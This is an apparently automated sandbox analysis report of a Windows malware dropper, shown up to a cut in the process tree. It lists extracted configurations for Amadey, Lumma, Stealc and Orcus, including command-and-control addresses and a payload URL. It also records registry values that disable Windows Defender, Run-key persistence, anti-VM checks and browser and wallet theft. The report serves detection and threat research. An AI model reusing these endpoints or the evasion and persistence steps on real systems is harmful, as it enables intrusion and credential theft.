Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-12-2024 02:29
Static task
static1
General
-
Target
458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
-
Size
1.8MB
-
MD5
cd86e4c2fbaf81cb17606d69108fff47
-
SHA1
97117dadf1a95214ceaf1d1d9337dae317c6a358
-
SHA256
458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e
-
SHA512
42393ee97337b197a176032276b9da8bd3ba26d5e5a36751130271422a9cb0a91d50a22c9f75e4de77083b47d8b6c7f54c5f1ebccd09f97dbba8eb6591554748
-
SSDEEP
49152:1hYf1buEc90mDAkzorHA/GJKEmQVhiln:Mf1qEcvDTSNXmQVh6
Malware Config
Extracted
https://exodus.lat/COMSurrogate.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
gcleaner
92.63.197.221
45.91.200.135
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://atten-supporse.biz/api
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
orcus
45.74.38.211:4782
7a9c0f279c464958aebbd585f20f1cf2
-
autostart_method
Disable
-
enable_keylogger
false
-
install_path
%programfiles%\Orcus\Orcus.exe
-
reconnect_delay
10000
-
registry_keyname
Orcus
-
taskscheduler_taskname
Orcus
-
watchdog_path
AppData\OrcusWatchdog.exe
Extracted
lumma
https://atten-supporse.biz/api
https://se-blurry.biz/api
https://zinc-sneark.biz/api
https://dwell-exclaim.biz/api
https://formy-spill.biz/api
https://covery-mover.biz/api
https://dare-curbys.biz/api
https://print-vexer.biz/api
Signatures
-
Amadey family
-
Gcleaner family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" a99fc41bfc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" a99fc41bfc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" a99fc41bfc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" a99fc41bfc.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection a99fc41bfc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" a99fc41bfc.exe -
Orcus family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 5064 created 3412 5064 Dr.com 56 -
TA505
Cybercrime group active since 2015, responsible for families like Dridex and Locky.
-
Ta505 family
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral2/files/0x0007000000024055-2957.dat family_xmrig behavioral2/files/0x0007000000024055-2957.dat xmrig -
Xmrig family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d5faa09673.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a99fc41bfc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 32dac93b2c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dc0bfa7b6f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Orcurs Rat Executable 1 IoCs
resource yara_rule behavioral2/memory/2544-929-0x0000000000700000-0x0000000000B04000-memory.dmp orcus -
Blocklisted process makes network request 3 IoCs
flow pid Process 201 4888 powershell.exe 208 4780 powershell.exe 212 4316 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 4780 powershell.exe 4316 powershell.exe 6108 powershell.exe 3548 powershell.exe 216 powershell.exe 2744 powershell.exe 216 powershell.exe 2744 powershell.exe 4888 powershell.exe 6092 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d5faa09673.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dc0bfa7b6f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dc0bfa7b6f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 32dac93b2c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a99fc41bfc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a99fc41bfc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d5faa09673.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 32dac93b2c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation wL3EGdM.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation RegAsm.exe -
Executes dropped EXE 15 IoCs
pid Process 2628 skotes.exe 1992 skotes.exe 4680 wL3EGdM.exe 116 d5faa09673.exe 5064 Dr.com 3024 32dac93b2c.exe 2848 dc0bfa7b6f.exe 4776 35d9f5c14a.exe 4712 skotes.exe 1156 a99fc41bfc.exe 2544 RegAsm.exe 1548 smartscreen.exe 1896 COMSurrogate.exe 3964 COMSurrogate.exe 3528 skotes.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine a99fc41bfc.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine d5faa09673.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 32dac93b2c.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine dc0bfa7b6f.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features a99fc41bfc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" a99fc41bfc.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM Surrogate = "C:\\Users\\Admin\\AppData\\Local\\asm\\COMSurrogate.exe" COMSurrogate.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM Surrogate = "C:\\Users\\Admin\\AppData\\Local\\asm\\COMSurrogate.exe" COMSurrogate.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32dac93b2c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012580001\\32dac93b2c.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dc0bfa7b6f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012581001\\dc0bfa7b6f.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\35d9f5c14a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012582001\\35d9f5c14a.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a99fc41bfc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012583001\\a99fc41bfc.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" smartscreen.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 222 api.ipify.org 223 api.ipify.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0002000000021fce-491.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2104 tasklist.exe 3580 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 4776 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe 2628 skotes.exe 1992 skotes.exe 116 d5faa09673.exe 3024 32dac93b2c.exe 2848 dc0bfa7b6f.exe 4712 skotes.exe 1156 a99fc41bfc.exe 3528 skotes.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe File opened for modification C:\Windows\MovieArchives wL3EGdM.exe File opened for modification C:\Windows\PackageExpression wL3EGdM.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 49 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 32dac93b2c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dc0bfa7b6f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 35d9f5c14a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wL3EGdM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d5faa09673.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 35d9f5c14a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a99fc41bfc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Dr.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 35d9f5c14a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Kills process with taskkill 5 IoCs
pid Process 3788 taskkill.exe 4144 taskkill.exe 2780 taskkill.exe 2648 taskkill.exe 3080 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings firefox.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2876 schtasks.exe 2788 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4776 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe 4776 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe 2628 skotes.exe 2628 skotes.exe 1992 skotes.exe 1992 skotes.exe 116 d5faa09673.exe 116 d5faa09673.exe 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 3024 32dac93b2c.exe 3024 32dac93b2c.exe 2848 dc0bfa7b6f.exe 2848 dc0bfa7b6f.exe 4712 skotes.exe 4712 skotes.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 1156 a99fc41bfc.exe 1156 a99fc41bfc.exe 1156 a99fc41bfc.exe 1156 a99fc41bfc.exe 1156 a99fc41bfc.exe 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 5064 Dr.com 2544 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 2104 tasklist.exe Token: SeDebugPrivilege 3580 tasklist.exe Token: SeDebugPrivilege 3788 taskkill.exe Token: SeDebugPrivilege 4144 taskkill.exe Token: SeDebugPrivilege 2780 taskkill.exe Token: SeDebugPrivilege 2648 taskkill.exe Token: SeDebugPrivilege 3080 taskkill.exe Token: SeDebugPrivilege 4984 firefox.exe Token: SeDebugPrivilege 4984 firefox.exe Token: SeDebugPrivilege 1156 a99fc41bfc.exe Token: SeDebugPrivilege 2544 RegAsm.exe Token: SeDebugPrivilege 216 powershell.exe Token: SeDebugPrivilege 4888 powershell.exe Token: SeDebugPrivilege 2744 powershell.exe Token: SeDebugPrivilege 4780 powershell.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeDebugPrivilege 6108 powershell.exe Token: SeDebugPrivilege 1896 COMSurrogate.exe Token: SeDebugPrivilege 3548 powershell.exe Token: SeDebugPrivilege 3964 COMSurrogate.exe Token: SeDebugPrivilege 6092 powershell.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 5064 Dr.com 5064 Dr.com 5064 Dr.com 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4776 35d9f5c14a.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe -
Suspicious use of SendNotifyMessage 34 IoCs
pid Process 5064 Dr.com 5064 Dr.com 5064 Dr.com 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4776 35d9f5c14a.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4984 firefox.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe 4776 35d9f5c14a.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4984 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4776 wrote to memory of 2628 4776 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe 82 PID 4776 wrote to memory of 2628 4776 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe 82 PID 4776 wrote to memory of 2628 4776 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe 82 PID 2628 wrote to memory of 4680 2628 skotes.exe 101 PID 2628 wrote to memory of 4680 2628 skotes.exe 101 PID 2628 wrote to memory of 4680 2628 skotes.exe 101 PID 4680 wrote to memory of 4380 4680 wL3EGdM.exe 102 PID 4680 wrote to memory of 4380 4680 wL3EGdM.exe 102 PID 4680 wrote to memory of 4380 4680 wL3EGdM.exe 102 PID 4380 wrote to memory of 2104 4380 cmd.exe 104 PID 4380 wrote to memory of 2104 4380 cmd.exe 104 PID 4380 wrote to memory of 2104 4380 cmd.exe 104 PID 4380 wrote to memory of 3520 4380 cmd.exe 105 PID 4380 wrote to memory of 3520 4380 cmd.exe 105 PID 4380 wrote to memory of 3520 4380 cmd.exe 105 PID 4380 wrote to memory of 3580 4380 cmd.exe 106 PID 4380 wrote to memory of 3580 4380 cmd.exe 106 PID 4380 wrote to memory of 3580 4380 cmd.exe 106 PID 4380 wrote to memory of 4840 4380 cmd.exe 107 PID 4380 wrote to memory of 4840 4380 cmd.exe 107 PID 4380 wrote to memory of 4840 4380 cmd.exe 107 PID 4380 wrote to memory of 4396 4380 cmd.exe 108 PID 4380 wrote to memory of 4396 4380 cmd.exe 108 PID 4380 wrote to memory of 4396 4380 cmd.exe 108 PID 4380 wrote to memory of 3920 4380 cmd.exe 109 PID 4380 wrote to memory of 3920 4380 cmd.exe 109 PID 4380 wrote to memory of 3920 4380 cmd.exe 109 PID 2628 wrote to memory of 116 2628 skotes.exe 110 PID 2628 wrote to memory of 116 2628 skotes.exe 110 PID 2628 wrote to memory of 116 2628 skotes.exe 110 PID 4380 wrote to memory of 5064 4380 cmd.exe 111 PID 4380 wrote to memory of 5064 4380 cmd.exe 111 PID 4380 wrote to memory of 5064 4380 cmd.exe 111 PID 4380 wrote to memory of 4932 4380 cmd.exe 112 PID 4380 wrote to memory of 4932 4380 cmd.exe 112 PID 4380 wrote to memory of 4932 4380 cmd.exe 112 PID 5064 wrote to memory of 1252 5064 Dr.com 113 PID 5064 wrote to memory of 1252 5064 Dr.com 113 PID 5064 wrote to memory of 1252 5064 Dr.com 113 PID 5064 wrote to memory of 2876 5064 Dr.com 115 PID 5064 wrote to memory of 2876 5064 Dr.com 115 PID 5064 wrote to memory of 2876 5064 Dr.com 115 PID 1252 wrote to memory of 2788 1252 cmd.exe 117 PID 1252 wrote to memory of 2788 1252 cmd.exe 117 PID 1252 wrote to memory of 2788 1252 cmd.exe 117 PID 2628 wrote to memory of 3024 2628 skotes.exe 119 PID 2628 wrote to memory of 3024 2628 skotes.exe 119 PID 2628 wrote to memory of 3024 2628 skotes.exe 119 PID 2628 wrote to memory of 2848 2628 skotes.exe 121 PID 2628 wrote to memory of 2848 2628 skotes.exe 121 PID 2628 wrote to memory of 2848 2628 skotes.exe 121 PID 2628 wrote to memory of 4776 2628 skotes.exe 122 PID 2628 wrote to memory of 4776 2628 skotes.exe 122 PID 2628 wrote to memory of 4776 2628 skotes.exe 122 PID 4776 wrote to memory of 3788 4776 35d9f5c14a.exe 124 PID 4776 wrote to memory of 3788 4776 35d9f5c14a.exe 124 PID 4776 wrote to memory of 3788 4776 35d9f5c14a.exe 124 PID 4776 wrote to memory of 4144 4776 35d9f5c14a.exe 127 PID 4776 wrote to memory of 4144 4776 35d9f5c14a.exe 127 PID 4776 wrote to memory of 4144 4776 35d9f5c14a.exe 127 PID 4776 wrote to memory of 2780 4776 35d9f5c14a.exe 129 PID 4776 wrote to memory of 2780 4776 35d9f5c14a.exe 129 PID 4776 wrote to memory of 2780 4776 35d9f5c14a.exe 129 PID 4776 wrote to memory of 2648 4776 35d9f5c14a.exe 131 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3412
-
C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe"C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"4⤵
